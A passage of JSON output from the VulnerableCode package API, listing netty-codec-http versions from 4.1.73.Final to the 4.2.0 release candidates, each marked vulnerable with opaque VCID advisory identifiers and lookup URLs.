on","purl":"pkg:maven/io.netty/netty-codec-http@4.1.73.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.73.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673244?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.74.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.74.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673245?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.75.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.75.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/143415?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.76.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-h4rg-c4rj-6kdj"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.76.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/83884?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.77.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.77.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673246?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.78.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.78.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673247?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.79.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.79.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673248?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.80.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.80.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673249?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.81.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.81.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673250?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.82.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.82.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/346490?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.83.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-m7b8-8zcj-uqey"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.83.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/346491?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.84.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-m7b8-8zcj-uqey"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.84.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/346492?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.85.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-m7b8-8zcj-uqey"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.85.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/80448?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.86.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.86.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673251?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.87.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.87.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673252?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.88.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.88.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673253?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.89.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.89.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673254?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.90.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.90.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673255?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.91.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.91.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673256?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.92.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.92.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673257?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.93.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.93.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673258?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.94.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.94.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673259?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.95.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.95.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673260?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.96.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.96.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673261?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.97.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.97.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673262?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.98.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.98.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673263?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.99.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.99.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673264?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.100.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.100.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673265?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.101.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.101.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673266?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.102.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.102.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673267?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.103.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.103.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673268?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.104.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.104.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673269?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.105.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.105.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673270?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.106.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.106.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/673271?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.107.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-rewk-dvth-tubh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.107.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/56553?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.108.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.108.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803569?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.109.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.109.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803570?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.110.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.110.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803571?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.111.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.111.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803572?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.112.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.112.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803573?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.113.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.113.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803574?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.114.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.114.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803575?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.115.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.115.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803576?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.116.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.116.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803577?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.117.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.117.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803578?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.118.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.118.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803579?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.119.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.119.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803580?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.120.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.120.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803581?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.121.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.121.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803582?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.122.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.122.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803583?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.123.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.123.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/803584?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.124.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.124.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/68849?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.125.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.125.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081007?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.126.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.126.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081008?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.127.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.127.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081009?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.128.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.128.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/67008?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.129.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.129.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081010?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.130.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.130.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/1081011?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.1.131.Final","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.1.131.Final"},{"url":"http://public2.vulnerablecode.io/api/packages/146723?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7rcj-a9zf-yfhb"},{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-fjsb-jkbh-7yf5"},{"vulnerability":"VCID-ga1d-p8wh-83dj"},{"vulnerability":"VCID-kkgx-1pny-pua1"},{"vulnerability":"VCID-m7wv-hqyx-rfbb"},{"vulnerability":"VCID-n9u5-a8js-hbf2"},{"vulnerability":"VCID-qyhp-twx4-vffc"},{"vulnerability":"VCID-sr2f-fg9d-w7g6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha1"},{"url":"http://public2.vulnerablecode.io/api/packages/803585?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha2"},{"url":"http://public2.vulnerablecode.io/api/packages/803586?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha3"},{"url":"http://public2.vulnerablecode.io/api/packages/803587?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha4"},{"url":"http://public2.vulnerablecode.io/api/packages/803588?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Alpha5"},{"url":"http://public2.vulnerablecode.io/api/packages/803589?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.Beta1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.Beta1"},{"url":"http://public2.vulnerablecode.io/api/packages/803590?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.RC1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.RC1"},{"url":"http://public2.vulnerablecode.io/api/packages/803591?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.RC2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.RC2"},{"url":"http://public2.vulnerablecode.io/api/packages/803592?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.RC3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.RC3"},{"url":"http://public2.vulnerablecode.io/api/packages/803593?format=json","purl":"pkg:maven/io.netty/netty-codec-http@4.2.0.RC4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9syp-fkzy-4fhy"},{"vulnerability":"VCID-n9u5-a8js-hbf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.netty/netty-codec-http@4.2.0.RC4"},{"url":"http://public2.vulnerablecode.io/